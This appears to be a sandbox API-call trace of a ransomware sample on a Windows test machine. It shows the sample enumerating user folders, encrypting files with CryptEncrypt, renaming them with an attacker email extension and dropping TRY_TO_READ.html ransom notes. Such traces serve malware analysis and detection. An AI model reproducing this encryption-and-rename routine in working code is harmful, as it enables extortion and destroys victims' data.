	[0100.060] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.062] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4
	[0100.062] GetProcessHeap () returned 0x540000
	[0100.062] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0100.062] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=486) returned 1
	[0100.062] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1e6
	[0100.062] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.062] GetProcessHeap () returned 0x540000
	[0100.062] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.062] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.062] WriteFile (in: hFile=0x4a4, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.063] WriteFile (in: hFile=0x4a4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.063] WriteFile (in: hFile=0x4a4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.063] ReadFile (in: hFile=0x4a4, lpBuffer=0x5fb388, nNumberOfBytesToRead=0x1e6, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb388*, lpNumberOfBytesRead=0x3a1f778*=0x1e6, lpOverlapped=0x0) returned 1
	[0100.063] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-486, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.063] WriteFile (in: hFile=0x4a4, lpBuffer=0x5fb578*, nNumberOfBytesToWrite=0x1e6, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb578*, lpNumberOfBytesWritten=0x3a1f778*=0x1e6, lpOverlapped=0x0) returned 1
	[0100.063] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.063] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.063] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0100.064] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned 48
	[0100.064] GetProcessHeap () returned 0x540000
	[0100.064] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc6) returned 0x598b60
	[0100.064] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini"
	[0100.064] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.064] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.067] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4
	[0100.067] GetProcessHeap () returned 0x540000
	[0100.067] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0100.067] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=580) returned 1
	[0100.067] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x244
	[0100.067] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.067] GetProcessHeap () returned 0x540000
	[0100.067] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.067] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.067] WriteFile (in: hFile=0x4a4, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.068] WriteFile (in: hFile=0x4a4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.068] WriteFile (in: hFile=0x4a4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.069] ReadFile (in: hFile=0x4a4, lpBuffer=0x5fb388, nNumberOfBytesToRead=0x244, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb388*, lpNumberOfBytesRead=0x3a1f778*=0x244, lpOverlapped=0x0) returned 1
	[0100.069] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-580, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.069] WriteFile (in: hFile=0x4a4, lpBuffer=0x5fb5d8*, nNumberOfBytesToWrite=0x244, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb5d8*, lpNumberOfBytesWritten=0x3a1f778*=0x244, lpOverlapped=0x0) returned 1
	[0100.069] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca7668f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7668f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da630
	[0100.069] FindNextFileW (in: hFindFile=0x5da630, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca7668f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7668f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.069] FindNextFileW (in: hFindFile=0x5da630, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30696a40, ftCreationTime.dwHighDateTime=0x1d4c746, ftLastAccessTime.dwLowDateTime=0xad782820, ftLastAccessTime.dwHighDateTime=0x1d4ce9c, ftLastWriteTime.dwLowDateTime=0xad782820, ftLastWriteTime.dwHighDateTime=0x1d4ce9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1fewhjdJ77juEpt4uSz", cAlternateFileName="1FEWHJ~1")) returned 1
	[0100.069] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1fewhjdJ77juEpt4uSz\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1fewhjdj77juept4usz\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8
	[0100.070] FindNextFileW (in: hFindFile=0x5da630, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0100.070] FindNextFileW (in: hFindFile=0x5da630, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9a239170, ftCreationTime.dwHighDateTime=0x1d4d08f, ftLastAccessTime.dwLowDateTime=0x50a13240, ftLastAccessTime.dwHighDateTime=0x1d4c938, ftLastWriteTime.dwLowDateTime=0x50a13240, ftLastWriteTime.dwHighDateTime=0x1d4c938, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="m5XQf7IE QfaMBa", cAlternateFileName="M5XQF7~1")) returned 1
	[0100.070] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m5xqf7ie qfamba\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8
	[0100.072] FindNextFileW (in: hFindFile=0x5da630, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca7668f0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7668f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6330e90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.072] FindNextFileW (in: hFindFile=0x5da630, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d665cd0, ftCreationTime.dwHighDateTime=0x1d4cb11, ftLastAccessTime.dwLowDateTime=0xda4966b0, ftLastAccessTime.dwHighDateTime=0x1d4d1e0, ftLastWriteTime.dwLowDateTime=0xda4966b0, ftLastWriteTime.dwHighDateTime=0x1d4d1e0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vzAcAI-TDvu1", cAlternateFileName="VZACAI~1")) returned 1
	[0100.072] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzacai-tdvu1\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8
	[0100.074] FindNextFileW (in: hFindFile=0x5da630, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c65f850, ftCreationTime.dwHighDateTime=0x1d4d3cd, ftLastAccessTime.dwLowDateTime=0x8e66bfe0, ftLastAccessTime.dwHighDateTime=0x1d4d3ca, ftLastWriteTime.dwLowDateTime=0x8e66bfe0, ftLastWriteTime.dwHighDateTime=0x1d4d3ca, nFileSizeHigh=0x0, nFileSizeLow=0x15146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XxkbSK-NOKJ.m4a", cAlternateFileName="XXKBSK~1.M4A")) returned 1
	[0100.074] FindNextFileW (in: hFindFile=0x5da630, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c65f850, ftCreationTime.dwHighDateTime=0x1d4d3cd, ftLastAccessTime.dwLowDateTime=0x8e66bfe0, ftLastAccessTime.dwHighDateTime=0x1d4d3ca, ftLastWriteTime.dwLowDateTime=0x8e66bfe0, ftLastWriteTime.dwHighDateTime=0x1d4d3ca, nFileSizeHigh=0x0, nFileSizeLow=0x15146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XxkbSK-NOKJ.m4a", cAlternateFileName="XXKBSK~1.M4A")) returned 0
	[0100.075] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.075] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.075] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XxkbSK-NOKJ.m4a", dwFileAttributes=0x80) returned 1
	[0100.075] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XxkbSK-NOKJ.m4a") returned 52
	[0100.075] GetProcessHeap () returned 0x540000
	[0100.075] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xce) returned 0x59d258
	[0100.075] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XxkbSK-NOKJ.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XxkbSK-NOKJ.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XxkbSK-NOKJ.m4a"
	[0100.075] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XxkbSK-NOKJ.m4a", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XxkbSK-NOKJ.m4a.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XxkbSK-NOKJ.m4a.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.075] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XxkbSK-NOKJ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xxkbsk-nokj.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XxkbSK-NOKJ.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xxkbsk-nokj.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.078] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XxkbSK-NOKJ.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xxkbsk-nokj.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8
	[0100.078] GetProcessHeap () returned 0x540000
	[0100.078] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0100.078] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=86342) returned 1
	[0100.078] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x15146
	[0100.078] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.078] GetProcessHeap () returned 0x540000
	[0100.078] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.078] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.078] WriteFile (in: hFile=0x4a8, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.079] WriteFile (in: hFile=0x4a8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.079] WriteFile (in: hFile=0x4a8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.080] ReadFile (in: hFile=0x4a8, lpBuffer=0x603bb8, nNumberOfBytesToRead=0x15146, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x603bb8*, lpNumberOfBytesRead=0x3a1f778*=0x15146, lpOverlapped=0x0) returned 1
	[0100.082] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.082] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.082] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0100.082] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned 48
	[0100.082] GetProcessHeap () returned 0x540000
	[0100.082] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc6) returned 0x598b60
	[0100.082] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini"
	[0100.082] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.082] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.084] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8
	[0100.084] GetProcessHeap () returned 0x540000
	[0100.085] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0100.085] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=504) returned 1
	[0100.085] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1f8
	[0100.085] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.085] GetProcessHeap () returned 0x540000
	[0100.085] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.085] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.085] WriteFile (in: hFile=0x4a8, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.086] WriteFile (in: hFile=0x4a8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.086] WriteFile (in: hFile=0x4a8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.086] ReadFile (in: hFile=0x4a8, lpBuffer=0x5fb388, nNumberOfBytesToRead=0x1f8, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb388*, lpNumberOfBytesRead=0x3a1f778*=0x1f8, lpOverlapped=0x0) returned 1
	[0100.086] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-504, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.086] WriteFile (in: hFile=0x4a8, lpBuffer=0x5fb588*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb588*, lpNumberOfBytesWritten=0x3a1f778*=0x1f8, lpOverlapped=0x0) returned 1
	[0100.086] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c65f850, ftCreationTime.dwHighDateTime=0x1d4d3cd, ftLastAccessTime.dwLowDateTime=0x8e66bfe0, ftLastAccessTime.dwHighDateTime=0x1d4d3ca, ftLastWriteTime.dwLowDateTime=0x8e66bfe0, ftLastWriteTime.dwHighDateTime=0x1d4d3ca, nFileSizeHigh=0x0, nFileSizeLow=0x15146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XxkbSK-NOKJ.m4a", cAlternateFileName="XXKBSK~1.M4A")) returned 0xffffffff
	[0100.086] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c65f850, ftCreationTime.dwHighDateTime=0x1d4d3cd, ftLastAccessTime.dwLowDateTime=0x8e66bfe0, ftLastAccessTime.dwHighDateTime=0x1d4d3ca, ftLastWriteTime.dwLowDateTime=0x8e66bfe0, ftLastWriteTime.dwHighDateTime=0x1d4d3ca, nFileSizeHigh=0x0, nFileSizeLow=0x15146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XxkbSK-NOKJ.m4a", cAlternateFileName="XXKBSK~1.M4A")) returned 0xffffffff
